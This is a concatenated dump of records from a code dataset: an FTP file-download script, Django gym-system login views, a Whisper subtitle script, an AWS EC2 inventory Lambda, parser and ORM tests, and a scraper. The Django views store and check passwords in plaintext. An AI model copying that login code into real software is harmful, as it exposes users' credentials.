'PASSWORD') #ftp login call\r\n \r\n # mode A will be directory traversal, mode B will be file download\r\n userDone = False\r\n userInput = input('Enter \"A\" for directory traversal or \"B\" for file downloading or \"exit\" to exit: ',)\r\n\r\n if userInput == 'exit':\r\n userDone = True\r\n print('--Connection closed--')\r\n \r\n while userDone != True:\r\n mode = userInput\r\n \r\n while mode == 'A' or mode == 'a':\r\n print('**Enter \"B\" for file download mode or \"exit\" to exit**')\r\n currentDir = ftp.pwd()\r\n print('Current directory: \"' + currentDir + '\"')\r\n dirList = []\r\n \r\n ftp.dir(dirList.append )\r\n listObj = ftp.nlst()\r\n count = 0\r\n for item in dirList:\r\n count += 1\r\n print(str(count) + \": \" + item)\r\n print('HINT: Enter \"back\" to go back a directory')\r\n userInput = input('Select directory to enter: ',)\r\n \r\n if userInput == 'B' or userInput == 'b':\r\n mode = 'B'\r\n continue\r\n elif userInput == 'A' or userInput == 'a':\r\n print(\"ERROR: You're already in this mode!\")\r\n continue\r\n \r\n if userInput == 'exit':\r\n userDone = True\r\n print('--Connection closed--') \r\n break \r\n \r\n if userInput == 'back':\r\n ftp.cwd('..')\r\n continue\r\n \r\n ftp.cwd(listObj[int(userInput) - 1]) \r\n \r\n while mode == 'B' or mode == 'b':\r\n print('**Enter \"A\" for directory traversal mode or \"exit\" to exit**')\r\n currentDir = ftp.pwd()\r\n print('Current directory: \"' + currentDir + '\"')\r\n dirList = []\r\n ftp.dir(dirList.append)\r\n listObj = ftp.nlst()\r\n count = 0\r\n \r\n for item in dirList:\r\n count += 1\r\n print(str(count) + \": \" + item)\r\n print('HINT: Enter \"all\" to download all files')\r\n userInput = input('Select file to download: ',)\r\n \r\n \r\n if userInput == 'A' or userInput == 'a':\r\n mode = 'A'\r\n continue\r\n \r\n elif userInput == 'B' or userInput == 'b':\r\n print(\"ERROR: You're already in this mode!\") \r\n continue\r\n \r\n if userInput == 'exit':\r\n userDone = True\r\n print('--Connection closed--') \r\n break\r\n \r\n if 
userInput == 'all':\r\n for file in listObj:\r\n sourceFileName = file\r\n newFile = file\r\n downloadedFile = os.path.join(r\"C:\\\\Users\\\\hgrewal\\\\Desktop\\\\TestDownloads\", newFile) #assign path and filename for above file to be downloaded into\r\n inputFile = open(downloadedFile, \"wb\") #set variable for file to retrieve and access type\r\n ftp.retrbinary(\"RETR \" + sourceFileName, inputFile.write) #call download function from FTP library\r\n inputFile.close() #close your open file\r\n print(downloadedFile + ' has been successfully received')\r\n continue\r\n \r\n sourceFileName = listObj[int(userInput) - 1]\r\n newFile = listObj[int(userInput) - 1]\r\n downloadedFile = os.path.join(r\"C:\\\\Users\\\\hgrewal\\\\Desktop\\\\TestDownloads\", newFile) #assign path and filename for above file to be downloaded into\r\n inputFile = open(downloadedFile, \"wb\") #set variable for file to retrieve and access type\r\n ftp.retrbinary(\"RETR \" + sourceFileName, inputFile.write) #call download function from FTP library\r\n inputFile.close() #close your open file\r\n print(downloadedFile + ' has been successfully received')\r\n\r\n","repo_name":"Retr0-Flow/Public-Scripts","sub_path":"qdFTP/qdFTP.py","file_name":"qdFTP.py","file_ext":"py","file_size_in_byte":5284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"}
+{"seq_id":"16878542949","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.contrib.auth.models import User\nfrom .models import Academia_Users\nfrom django.contrib.auth.forms import AuthenticationForm\nfrom aluno.models import Aluno\n\ndef home(request):\n return render(request,'academia/home.html')\n\ndef login(request):\n\n if(request.method == 'POST'):\n data = request.POST.copy()\n\n username = data.get('username')\n if(data.get('tipo') == \"Aluno\"):\n user_found = Aluno.objects.filter(usuario=username).first()\n tipo = \"aluno\"\n else:\n user_found = Academia_Users.objects.filter(username=username).first()\n if(user_found):\n tipo = user_found.tipo.lower()\n if(user_found != None):\n if(user_found.password == data.get('password')):\n messages.success(request,f'Bem-vindo {username}! Você foi logado com sucesso!')\n request.session['user_logged_id'] = user_found.id\n return redirect(f'academia-{tipo}')\n else:\n messages.error(request,f'Nome ou usuario inválidos')\n return render(request,'academia/login.html')\n else:\n messages.error(request,f'Nome ou usuario inválidos')\n return render(request,'academia/login.html')\n\n return render(request,'academia/login.html')\n\ndef register(request):\n\n if(request.method == 'POST'):\n data = request.POST.copy()\n \n new_user = Academia_Users(username=data.get('usuario'),password=data.get('senha'),email=data.get('email'),tipo=data.get('tipo'))\n new_user.save()\n messages.success(request,f'Bem-vindo {data.get(\"usuario\")}! 
Você foi registrado com sucesso!')\n return redirect('academia-home')\n\n return render(request,'academia/register.html')\n\n\ndef secretario(request):\n return render(request,'academia/secretario.html',{'username':\"Teste\"})","repo_name":"SinvalVJunior/sistema-academia","sub_path":"Sistema_Academia/academia/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12233079556","text":"import glob\r\nimport os\r\nimport whisper\r\nimport whisper.utils\r\n\r\n\r\ndef format_timestamp(seconds: float, always_include_hours: bool = False, fractionalSeperator: str = '.'):\r\n assert seconds >= 0, \"non-negative timestamp expected\"\r\n milliseconds = round(seconds * 1000.0)\r\n\r\n hours = milliseconds // 3_600_000\r\n milliseconds -= hours * 3_600_000\r\n\r\n minutes = milliseconds // 60_000\r\n milliseconds -= minutes * 60_000\r\n\r\n seconds = milliseconds // 1_000\r\n milliseconds -= seconds * 1_000\r\n\r\n hours_marker = f\"{hours:02d}:\" if always_include_hours or hours > 0 else \"\"\r\n return f\"{hours_marker}{minutes:02d}:{seconds:02d}{fractionalSeperator}{milliseconds:03d}\"\r\n\r\n\r\nmodel = whisper.load_model(\"large\")\r\nprint(\"model loaded\")\r\ndir_name = '/content/'\r\n# Get list of all files in a given directory sorted by name\r\nlist_of_files = sorted(filter(os.path.isfile,\r\n glob.glob(dir_name + 'out*.mp3')))\r\n# Iterate over sorted list of files and print the file paths\r\n# one by one.\r\ncount = 0\r\n\r\nfor file_path in list_of_files:\r\n fileNumber = int(file_path[12:15])\r\n startingTimeMins = fileNumber * 2\r\n print(file_path + \" \" + str(fileNumber * 2))\r\n\r\n if startingTimeMins >= 0:\r\n text = model.transcribe(file_path, task='translate')\r\n print(str(type(text)))\r\n with open(\"/content/MVSD-390.srt\", \"a\", encoding=\"utf-8\") as srt_file:\r\n\r\n for i, segment in enumerate(text['segments'], start=1):\r\n print(segment)\r\n count = count + 1\r\n # write srt lines\r\n print(\r\n f\"{count}\\n\"\r\n f\"{format_timestamp(segment['start'] + (startingTimeMins * 60), always_include_hours=True, fractionalSeperator=',')} --> \"\r\n f\"{format_timestamp(segment['end'] + (startingTimeMins * 60), always_include_hours=True, fractionalSeperator=',')}\\n\"\r\n f\"{segment['text']}\\n\",\r\n file=srt_file,\r\n flush=True,\r\n )\r\n print(text)","repo_name":"domxch/whisperSubtitles","sub_path":"whisperSubtitles.py","file_name":"whisperSubtitles.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1058459272","text":"from django.urls import reverse\nfrom rest_framework import status\nfrom rest_framework.test import APITestCase\nfrom .models import IiefQuestionnaire\n\nclass IiefQuestionnaireTests(APITestCase):\n def test_create_iief_questionnaire(self):\n\n url = reverse('iiefquestionnaire-list')\n data = {\"data\": \n {\"type\": \"IiefQuestionnaire\", \n \"attributes\": {\"confidence\": 4, \"penetration\": 2, \"intercourse\": 4,\"completion\": 3, \"satisfaction\": 2}\n }\n }\n response = self.client.post(url, data)\n\n # Ensure we can create a new iief_questionnaire object.\n self.assertEqual(response.status_code, status.HTTP_201_CREATED)\n\n # Ensure the iief_questionnaire object is well created.\n self.assertEqual(IiefQuestionnaire.objects.count(), 1)\n\n # Ensure the score is correct.\n 
self.assertEqual(IiefQuestionnaire.objects.get().score, 15)\n","repo_name":"MhamedBendenia/IIEF-Analysis-Web-App","sub_path":"web_app/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"2002321001","text":"import numpy as np\n\nfrom dotenv import load_dotenv\n\nfrom tqdm import tqdm\nimport csv\nimport os\nimport pickle\nimport time\n\nfrom soup import get_soup\nfrom get_film_urls import get_links_in_four_cycle\n\nload_dotenv()\n\n\ndef get_film_descr(url: str) -> list[str, float]:\n \"\"\"return description, genre and rating of film\"\"\"\n soup = get_soup(url)\n\n rating = soup.find('span', class_='styles_value__N2Vzt').text\n rating = np.NAN if (rating == '–') else float(rating)\n\n descr = soup.find('div', class_='styles_synopsisSection__nJoAj').find('p').text\n\n genres = soup.find('div', attrs={'data-tid': '28726596'}).find('div').find_all('a')\n genres = [genre.text for genre in genres]\n genre_str = ','.join(genres)\n\n return [descr, genre_str, rating]\n\n\nif __name__ == '__main__':\n\n # collect links of films\n film_links = []\n if os.path.exists('../data/links.pkl'):\n with open('../data/links.pkl', 'rb') as file_:\n film_links = pickle.load(file_)\n print('len:', len(film_links))\n else:\n film_links = get_links_in_four_cycle()\n print('len', len(film_links))\n with open('../data/links.pkl', 'wb') as file_:\n pickle.dump(film_links, file_)\n\n # create list of checked films\n with open('checked_films.txt', 'r') as file:\n content = file.read()\n checked_films = content.split('\\n') if content else []\n\n # get description of films\n films = []\n print('Start to get data')\n for film_url in tqdm(film_links):\n if film_url in checked_films:\n continue\n else:\n try:\n film = get_film_descr(film_url)\n films.append(film)\n print(len(films))\n checked_films.append(film_url)\n time.sleep(2)\n except:\n time.sleep(2)\n\n with open('checked_films.txt', 'w') as file_:\n print(f'amount of checked links: {len(checked_films)}')\n file_.write('\\n'.join(checked_films))\n\n headers = ['description', 'genre', 'rating']\n with open('../data/film_ratings_1.csv', 'a', encoding='utf-8-sig', newline='') as file_:\n writer = csv.writer(file_, delimiter=';')\n writer.writerow(headers)\n writer.writerows(films)\n print('File is created')\n","repo_name":"andreyshishkov/film_rating_regressor","sub_path":"flm_parser/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":2302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28520341002","text":"import boto3\nfrom botocore.exceptions import ClientError\nimport json\nimport os\nimport time\nfrom datetime import datetime, timezone\nfrom dateutil import tz\n\nfrom antiope.aws_account import *\nfrom common import *\n\nimport logging\nlogger = logging.getLogger()\nlogger.setLevel(getattr(logging, os.getenv('LOG_LEVEL', default='INFO')))\nlogging.getLogger('botocore').setLevel(logging.WARNING)\nlogging.getLogger('boto3').setLevel(logging.WARNING)\nlogging.getLogger('urllib3').setLevel(logging.WARNING)\n\nINSTANCE_RESOURCE_PATH = \"ec2/instance\"\nSG_RESOURCE_PATH = \"ec2/securitygroup\"\n\n\ndef lambda_handler(event, context):\n logger.debug(\"Received event: \" + json.dumps(event, sort_keys=True))\n message = json.loads(event['Records'][0]['Sns']['Message'])\n logger.info(\"Received message: \" + json.dumps(message, sort_keys=True))\n\n try:\n 
target_account = AWSAccount(message['account_id'])\n        regions = target_account.get_regions()\n        if 'region' in message:\n            regions = [message['region']]\n\n        # describe ec2 instances\n        for r in regions:\n            try:\n                ec2_client = target_account.get_client('ec2', region=r)\n                process_instances(target_account, ec2_client, r)\n                # describe ec2 security groups\n                process_securitygroups(target_account, ec2_client, r)\n            except ClientError as e:\n                # Move onto next region if we get access denied. This is probably SCPs\n                if e.response['Error']['Code'] == 'AccessDeniedException':\n                    logger.error(f\"AccessDeniedException for region {r} in function {context.function_name} for {target_account.account_name}({target_account.account_id})\")\n                    continue\n                else:\n                    raise  # pass on to the next handler\n\n    except AntiopeAssumeRoleError as e:\n        logger.error(\"Unable to assume role into account {}({})\".format(target_account.account_name, target_account.account_id))\n        return()\n    except ClientError as e:\n        logger.critical(\"AWS Error getting info for {}: {}\".format(message['account_id'], e))\n        capture_error(message, context, e, \"ClientError for {}: {}\".format(message['account_id'], e))\n        raise\n    except Exception as e:\n        logger.critical(\"{}\\nMessage: {}\\nContext: {}\".format(e, message, vars(context)))\n        capture_error(message, context, e, \"General Exception for {}: {}\".format(message['account_id'], e))\n        raise\n\n\ndef process_instances(target_account, ec2_client, region):\n\n    instance_profiles = get_instance_profiles(ec2_client)\n    instance_reservations = get_all_instances(ec2_client)\n    logger.info(\"Found {} instance reservations for {} in {}\".format(len(instance_reservations), target_account.account_id, region))\n\n    # dump info about instances to S3 as json\n    for reservation in instance_reservations:\n        for instance in reservation['Instances']:\n\n            resource_item = {}\n            resource_item['awsAccountId'] = target_account.account_id\n            resource_item['awsAccountName'] = target_account.account_name\n            resource_item['resourceType'] = \"AWS::EC2::Instance\"\n            resource_item['source'] = \"Antiope\"\n            resource_item['configurationItemCaptureTime'] = str(datetime.now())\n            resource_item['awsRegion'] = region\n            resource_item['configuration'] = instance\n            if 'Tags' in instance:\n                resource_item['tags'] = parse_tags(instance['Tags'])\n            resource_item['supplementaryConfiguration'] = {}\n            resource_item['resourceId'] = instance['InstanceId']\n            resource_item['resourceCreationTime'] = instance['LaunchTime']\n            resource_item['errors'] = {}\n\n            if instance['InstanceId'] in instance_profiles:\n                resource_item['supplementaryConfiguration']['IamInstanceProfileAssociation'] = instance_profiles[instance['InstanceId']]\n\n            save_resource_to_s3(INSTANCE_RESOURCE_PATH, resource_item['resourceId'], resource_item)\n\n\ndef process_securitygroups(target_account, ec2_client, region):\n\n    sec_groups = get_all_securitygroups(ec2_client)\n    logger.info(\"Found {} security groups for {} in {}\".format(len(sec_groups), target_account.account_id, region))\n\n    # dump info about security groups to S3 as json\n    for sec_group in sec_groups:\n\n        resource_item = {}\n        resource_item['awsAccountId'] = target_account.account_id\n        resource_item['awsAccountName'] = target_account.account_name\n        resource_item['resourceType'] = \"AWS::EC2::SecurityGroup\"\n        resource_item['source'] = \"Antiope\"\n        resource_item['configurationItemCaptureTime'] = str(datetime.now())\n        resource_item['awsRegion'] = region\n        resource_item['configuration'] = sec_group\n        if 'Tags' in 
sec_group:\n resource_item['tags'] = parse_tags(sec_group['Tags'])\n resource_item['supplementaryConfiguration'] = {}\n resource_item['resourceId'] = sec_group['GroupId']\n resource_item['errors'] = {}\n save_resource_to_s3(SG_RESOURCE_PATH, resource_item['resourceId'], resource_item)\n\n\ndef get_instance_profiles(ec2_client):\n assoc = []\n response = ec2_client.describe_iam_instance_profile_associations()\n while 'NextToken' in response:\n assoc += response['IamInstanceProfileAssociations']\n response = ec2_client.describe_iam_instance_profile_associations(NextToken=response['NextToken'])\n assoc += response['IamInstanceProfileAssociations']\n\n output = {}\n for a in assoc:\n output[a['InstanceId']] = a\n return(output)\n\n\ndef get_all_instances(ec2_client):\n output = []\n response = ec2_client.describe_instances()\n while 'NextToken' in response:\n output += response['Reservations']\n response = ec2_client.describe_instances(NextToken=response['NextToken'])\n output += response['Reservations']\n return(output)\n\n\ndef get_all_securitygroups(ec2_client):\n output = []\n response = ec2_client.describe_security_groups()\n while 'NextToken' in response:\n output += response['SecurityGroups']\n response = ec2_client.describe_security_groups(NextToken=response['NextToken'])\n output += response['SecurityGroups']\n return(output)\n","repo_name":"turnerlabs/antiope","sub_path":"aws-inventory/lambda/inventory-instances-sg.py","file_name":"inventory-instances-sg.py","file_ext":"py","file_size_in_byte":6696,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"31"} +{"seq_id":"29021154360","text":"#!/usr/bin/python3 -S\n# -*- coding: utf-8 -*-\nfrom cargo.fields import Enum\n\nfrom unit_tests.fields.Field import *\nfrom unit_tests import configure\n\n\nclass TestEnum(configure.SequenceTestCase, TestField):\n\n @property\n def base(self):\n return self.orm.enum\n\n def test_init(self):\n with self.assertRaises(TypeError):\n Enum()\n\n def test_validate(self):\n enum = [1, 2, 3, 4, 'five', 'six', 'seven']\n base = Enum(*enum)\n base.value = 5\n self.assertFalse(base.validate())\n base(None)\n self.assertTrue(base.validate())\n base('five')\n self.assertTrue(base.validate())\n\n def test___call__(self):\n enum = [1, 2, 3, 4, 'five', 'six', 'seven']\n base = Enum(*enum)\n self.assertTupleEqual(base.types, tuple(enum))\n for val in enum:\n self.assertEqual(base(val), val)\n for val in ['taco', {'b': 'c'}, [2], 1234, 6.0]:\n with self.assertRaises(ValueError):\n base(val)\n\n def test_insert(self):\n self.base('red')\n val = getattr(self.orm.naked().insert(self.base), self.base.field_name)\n self.assertEqual(val, 'red')\n\n self.base(None)\n val = getattr(self.orm.naked().insert(self.base), self.base.field_name)\n self.assertEqual(val, None)\n\n def test_select(self):\n self.assertIs(self.base.value, self.base.empty)\n self.base('blue')\n self.orm.insert(self.base)\n orm = self.orm.new()\n val = getattr(orm.naked().order_by(self.orm.uid.desc()).get(),\n self.base.field_name)\n self.assertEqual(val, self.base.value)\n\n def test_array_insert(self):\n arr = ['red', 'white']\n self.base_array(arr)\n val = getattr(self.orm.naked().insert(self.base_array),\n self.base_array.field_name)\n self.assertListEqual(val, arr)\n\n def test_array_select(self):\n arr = ['red', 'white']\n self.base_array(arr)\n val = getattr(self.orm.naked().insert(self.base_array),\n self.base_array.field_name)\n val_b = getattr(self.orm.naked().desc(self.orm.uid).get(),\n 
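# --- editorial sketch ----------------------------------------------------------
# The inventory code above pages through results by looping on 'NextToken'.
# boto3 ships built-in paginators that do the same bookkeeping; a hedged
# alternative (not the repo's code) for describe_instances:
import boto3

def get_all_instances_paginated(ec2_client):
    reservations = []
    for page in ec2_client.get_paginator("describe_instances").paginate():
        reservations.extend(page["Reservations"])
    return reservations

# usage: get_all_instances_paginated(boto3.client("ec2", region_name="us-east-1"))
# -------------------------------------------------------------------------------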
self.base_array.field_name)\n self.assertListEqual(val, val_b)\n\n def test_type_name(self):\n self.assertEqual(self.base.type_name, 'sequence_model_enum_enumtype')\n self.assertEqual(self.base_array.type_name,\n 'sequence_model_array_enum_enumtype[]')\n\n\nif __name__ == '__main__':\n # Unit test\n configure.run_tests(TestEnum, failfast=True, verbosity=2)\n","repo_name":"jaredLunde/cargo-orm","sub_path":"unit_tests/fields/Enum.py","file_name":"Enum.py","file_ext":"py","file_size_in_byte":2613,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"71417018649","text":"\"\"\"The abstract syntax tree elements and parser.\"\"\"\n\nimport collections\nimport contextlib\nimport functools\n\nfrom weirdc import CompileError, Location, utils\n\n\ndef _node(name, fields):\n return utils.miniclass(__name__, name, ['location'] + fields)\n\n# expressions that can also be statements\n# only FunctionCall makes sense as a statement, so other statements\n# are removed in checker.py\nName = _node('Name', ['name'])\nInteger = _node('Integer', ['value'])\nString = _node('String', ['value'])\nFunctionCall = _node('FunctionCall', ['function', 'args'])\n\n# these aren't valid expressions\nDeclaration = _node('Declaration', ['type', 'name'])\nAssignment = _node('Assignment', ['target', 'value'])\nIf = _node('If', ['condition', 'body'])\nReturn = _node('Return', ['value'])\nFunctionDef = _node('FunctionDef', ['name', 'args', 'returntype', 'body'])\n\n# these doesn't have locations, so we can't use _node()\n# TODO: add these everywhere in decreffer.py\nIncRef = utils.miniclass(__name__, 'IncRef', ['varname'])\nDecRef = utils.miniclass(__name__, 'DecRef', ['varname'])\n\n\n# this kind of abuses EOFError... feels good, i'm evil >:D MUHAHAHAA!!!\nclass _HandyDandyTokenIterator:\n\n def __init__(self, iterable):\n self._iterator = iter(iterable)\n self._coming_up_stack = collections.deque()\n\n # this is only used in _Parser.parse_file()\n self.last_popped = None\n\n def pop(self):\n try:\n result = self._coming_up_stack.pop()\n except IndexError:\n try:\n result = next(self._iterator)\n except StopIteration:\n raise EOFError\n\n self.last_popped = result\n return result\n\n def coming_up(self, n=1):\n while len(self._coming_up_stack) < n:\n try:\n # pop() doesn't work if there's something on _coming_up_stack\n self._coming_up_stack.appendleft(next(self._iterator))\n except StopIteration as e:\n raise EOFError from e\n return self._coming_up_stack[-n]\n\n # this must be \"check and pop\", not \"pop and check\"\n # that way this can be used in try/except\n def check_and_pop(self, kind, value=None):\n if value is not None and self.coming_up().value != value:\n raise CompileError(\"this should be '%s'\" % value,\n self.coming_up().location)\n\n if self.coming_up().kind != kind:\n raise CompileError(\n \"this should be %s\" % utils.add_article(kind.lower()),\n self.coming_up().location)\n\n return self.pop()\n\n # this skips everything except the first NEWLINE when there are\n # multiple NEWLINE tokens with nothing in between\n def pop_newline(self):\n try:\n self.check_and_pop('NEWLINE')\n while self.coming_up().kind == 'NEWLINE':\n self.pop()\n except EOFError:\n # no trailing newline at the end of file\n pass\n\n\n_KEYWORDS = {'return', 'if'}\n\n\nclass _Parser:\n\n def __init__(self, tokens):\n self.tokens = _HandyDandyTokenIterator(tokens)\n\n def parse_name(self, check_for_keywords=True):\n # thing\n token = self.tokens.check_and_pop('NAME')\n if 
check_for_keywords and token.value in _KEYWORDS:\n raise CompileError(\n \"%s is not a valid variable name because it has a \"\n \"special meaning\" % token.value,\n token.location)\n return Name(token.location, token.value)\n\n def parse_integer(self):\n # 3735928559\n token = self.tokens.check_and_pop('INTEGER')\n return Integer(token.location, token.value)\n\n def parse_string(self):\n # \"hello world\"\n # TODO: \"hello \\\"world\\\" ${some code}\"\n token = self.tokens.check_and_pop('STRING')\n return String(token.location, token.value[1:-1])\n\n def parse_parentheses(self):\n # ( expr )\n # parentheses don't have a node type because they just change\n # the evaluation order\n self.tokens.check_and_pop('OP', '(')\n content = self.parse_expression()\n self.tokens.check_and_pop('OP', ')')\n return content\n\n # return (element_list, stop_token)\n def _parse_comma_list(self, start='(', stop=')', parsemethod=None):\n # ( )\n # ( element )\n # ( element , )\n # ( element , element )\n # ( element , element , )\n # ...\n if parsemethod is None:\n parsemethod = self.parse_expression\n\n start_token = self.tokens.check_and_pop('OP', start)\n if self.tokens.coming_up().startswith(['OP', stop]):\n # empty list\n return ([], self.tokens.pop())\n\n elements = []\n while True:\n if self.tokens.coming_up().startswith(['OP', ',']):\n raise CompileError(\"don't put a ',' here\",\n self.tokens.coming_up().location)\n elements.append(parsemethod())\n\n if self.tokens.coming_up().startswith(['OP', stop]):\n return (elements, self.tokens.pop())\n\n comma = self.tokens.check_and_pop('OP', ',')\n if self.tokens.coming_up().startswith(['OP', ',']):\n raise CompileError(\n \"two ',' characters\",\n Location.between(comma, self.tokens.coming_up()))\n\n if self.tokens.coming_up().startswith(['OP', stop]):\n return (elements, self.tokens.pop())\n\n def parse_expression(self):\n coming_up = self.tokens.coming_up()\n if coming_up.kind == 'NAME':\n # hello\n result = self.parse_name()\n elif coming_up.kind == 'STRING':\n # \"hello\"\n result = self.parse_string()\n elif coming_up.kind == 'INTEGER':\n # 123\n result = self.parse_integer()\n elif coming_up.startswith(['OP', '(']):\n result = self.parse_parentheses()\n else:\n raise CompileError(\n \"this should be variable name, string, integer or '('\",\n coming_up.location)\n\n # check for function calls, this is a while loop to allow\n # function calls like thing()()()\n while self.tokens.coming_up().startswith(['OP', '(']):\n args, stop_token = self._parse_comma_list('(', ')')\n result = FunctionCall(Location.between(result, stop_token),\n result, args)\n\n return result\n\n # rest of these methods are for parsing statements\n\n def parse_expression_statement(self):\n # expression and newline\n value = self.parse_expression()\n self.tokens.pop_newline()\n return value\n\n def assignment(self):\n # thing = value\n # TODO: thing's stuff = value\n target = self.parse_name()\n self.tokens.check_and_pop('OP', '=')\n value = self.parse_expression()\n self.tokens.pop_newline()\n return Assignment(Location.between(target, value), target, value)\n\n def parse_if(self):\n # if cond { statements }\n the_if = self.tokens.check_and_pop('NAME', 'if')\n condition = self.parse_expression()\n\n self.tokens.check_and_pop('OP', '{')\n body = []\n\n # allow \"if thing { }\" without a newline\n if not self.tokens.coming_up().startswith(['OP', '}']):\n self.tokens.pop_newline()\n while not self.tokens.coming_up().startswith(['OP', '}']):\n body.extend(self.parse_statement())\n 
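# --- editorial sketch ----------------------------------------------------------
# _HandyDandyTokenIterator above implements n-token lookahead by buffering
# items popped from the underlying iterator onto a deque (appendleft to stash,
# pop to consume from the right). The same idea in miniature, with
# hypothetical names:
import collections

class Peekable:
    def __init__(self, iterable):
        self._it = iter(iterable)
        self._buffer = collections.deque()

    def peek(self, n=1):
        while len(self._buffer) < n:          # fill until n items are buffered
            self._buffer.appendleft(next(self._it))
        return self._buffer[-n]

    def pop(self):
        return self._buffer.pop() if self._buffer else next(self._it)

p = Peekable("abc")
assert p.peek() == "a" and p.pop() == "a" and p.peek(2) == "c" and p.pop() == "b"
# -------------------------------------------------------------------------------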
closing_brace = self.tokens.check_and_pop('OP', '}')\n\n self.tokens.pop_newline()\n return If(Location.between(the_if, closing_brace), condition, body)\n\n def _type_and_name(self):\n # Int a\n # this returns (typenode, name_string)\n typenode = self.parse_name() # TODO: module's Thing\n name = self.parse_name()\n return (typenode, name)\n\n def parse_declaration(self) -> list:\n # Int thing\n # Int thing = expr\n # TODO: module.Thingy thing\n #\n # \"Int thing = expr\" produces overlapping Declaration and\n # Assignment nodes, that's why this returns a list of nodes\n datatype = self.parse_name() # TODO: module's Thing\n variable = self.parse_name()\n\n if self.tokens.coming_up().kind == 'NEWLINE':\n self.tokens.pop_newline()\n return [Declaration(Location.between(datatype, variable),\n datatype, variable.name)]\n\n self.tokens.check_and_pop('OP', '=')\n initial_value = self.parse_expression()\n self.tokens.pop_newline()\n return [Declaration(Location.between(datatype, variable),\n datatype, variable.name),\n Assignment(Location.between(variable, initial_value),\n variable, initial_value)]\n\n def parse_return(self):\n the_return = self.tokens.check_and_pop('NAME', 'return')\n value = self.parse_expression()\n self.tokens.pop_newline()\n return Return(Location.between(the_return, value), value)\n\n def parse_statement(self) -> list:\n # coming_up(1) and coming_up(2) work because there's always a\n # newline and at least something before it\n if self.tokens.coming_up(1).kind == 'NAME':\n if self.tokens.coming_up(1).value == 'return':\n return [self.parse_return()]\n if self.tokens.coming_up(1).value == 'if':\n return [self.parse_if()]\n if self.tokens.coming_up(1).value == 'function':\n return [self.parse_function_def()]\n\n try:\n after_name = self.tokens.coming_up(2)\n except EOFError:\n return [self.parse_expression_statement()]\n\n if after_name.startswith(['OP', '=']):\n return [self.assignment()]\n if after_name.kind == 'NAME':\n return self.parse_declaration()\n\n return [self.parse_expression_statement()]\n\n def parse_function_def(self):\n # function main() { ... }\n # function thing() returns Int { ... 
}\n function_keyword = self.tokens.check_and_pop('NAME', 'function')\n name = self.parse_name()\n args, junk = self._parse_comma_list(\n '(', ')', parsemethod=self._type_and_name)\n\n if self.tokens.coming_up().startswith(['NAME', 'returns']):\n self.tokens.pop()\n returntype = self.parse_name()\n else:\n returntype = None\n\n opening_brace = self.tokens.check_and_pop('OP', '{')\n if self.tokens.coming_up().kind == 'NEWLINE':\n self.tokens.pop_newline()\n body = []\n while not self.tokens.coming_up().startswith(['OP', '}']):\n body.extend(self.parse_statement())\n closing_brace = self.tokens.check_and_pop('OP', '}')\n self.tokens.pop_newline()\n\n return FunctionDef(Location.between(function_keyword, closing_brace),\n name.name, args, returntype, body)\n\n def parse_file(self):\n while True:\n try:\n self.tokens.coming_up(1)\n except EOFError:\n break\n\n try:\n yield from self.parse_statement()\n except EOFError:\n # underline 3 blanks after last token\n last_location = self.tokens.last_popped.location\n mark_here = Location(last_location.end, last_location.end+3,\n last_location.lineno)\n\n # python abbreviates this as EOF and beginners don't\n # understand it, but i guess this one is good enough\n raise CompileError(\"unexpected end of file\", mark_here)\n\n\ndef parse(tokens):\n \"\"\"Convert an iterable of tokens to AST nodes.\n\n This returns an iterator.\n \"\"\"\n parser = _Parser(tokens)\n return parser.parse_file()\n","repo_name":"Akuli/weird-language","sub_path":"weirdc/ast.py","file_name":"ast.py","file_ext":"py","file_size_in_byte":11975,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"34107242264","text":"import unittest\nimport merge_sorted_arrays\n\n\nclass TestProgram(unittest.TestCase):\n def test_case_1(self):\n arrays = [\n [1, 5, 9, 21],\n [-1, 0],\n [-124, 81, 121],\n [3, 6, 12, 20, 150],\n ]\n output = merge_sorted_arrays.mergeSortedArrays(arrays)\n self.assertEqual(output, [-124, -1, 0, 1, 3, 5, 6, 9, 12, 20, 21, 81, 121, 150])\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"acemodou/Working-Copy","sub_path":"DataStructures/v1/Heaps/problems/test_merge_sorted_array.py","file_name":"test_merge_sorted_array.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13809002691","text":"import os\nimport pathlib\nimport numpy as np\nimport os\nimport six.moves.urllib as urllib\nimport sys\nimport tarfile\nimport tensorflow as tf\nimport zipfile\nfrom collections import defaultdict\nfrom io import StringIO\nfrom matplotlib import pyplot as plt\nfrom PIL import Image\nfrom IPython.display import display\nfrom object_detection.utils import ops as utils_ops\nfrom object_detection.utils import label_map_util\nfrom object_detection.utils import visualization_utils as vis_util\nfrom .models import *\nimport re\n\nMIN_DETECTION_SCORE = 0.6\n\n#this class Model loads the trained model and the neccassary id and names from database\n# into main memory at program initialization \nclass Model:\n detection_model = tf.saved_model.load(\"C:\\\\Users\\\\Hussa\\\\Desktop\\\\TF2\\\\Experiment\\\\inference\\\\ExportedSavedModel\\\\saved_model\")\n\n getId = {}\n #map each original name from database to ID\n for id_and_name in Faculty.objects.values('id', 'name'):\n getId[id_and_name['name']] = id_and_name['id'] \n\n #map names coming from model to their ids using the map \"getId\"\n faculties_ids={\n 'none' : 0,\n 
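# --- editorial sketch (assumption: the module under test is not in this dump) -
# test_merge_sorted_array above exercises merge_sorted_arrays.mergeSortedArrays,
# which is not included here. A minimal implementation consistent with the
# test, using the standard library's k-way heap merge:
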